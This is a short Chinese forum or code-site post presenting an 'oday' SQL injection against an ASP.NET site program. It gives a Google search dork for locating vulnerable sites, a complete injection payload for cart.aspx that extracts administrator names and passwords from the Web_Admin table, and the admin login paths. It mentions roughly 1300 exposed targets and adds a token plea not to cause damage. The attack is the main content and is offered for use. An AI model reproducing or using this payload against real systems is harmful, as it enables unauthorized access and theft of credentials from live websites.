首页 > 代码库 > 0DAY漏洞之谷歌搜索 -中国寒龙网病毒联盟
0DAY漏洞之谷歌搜索 -中国寒龙网病毒联盟
这里公布一个关于aspx网站程序的oday方法很简单。直接爆出管理密码。
也是利用注入漏洞。
利用代码
谷歌搜索关键字:inurl:scoreindex.aspx
- cart.aspx?act=buy&id=1 and (SelectTop1char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124)From(SelectTop4[Name],[Pass]From[Web_Admin]Where1=1Order by [Name],[Pass]) T Order by [Name] desc,[Pass] desc)>0--
后台地址:/weblogin/Login.aspx
后台地址/weblogin/index.aspx
这个oday出来也有一段时间了。搜索一下也有1300多个搜索结果,公布漏洞的目标不是为了让大家去搞破坏。希望大家合理利用。
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。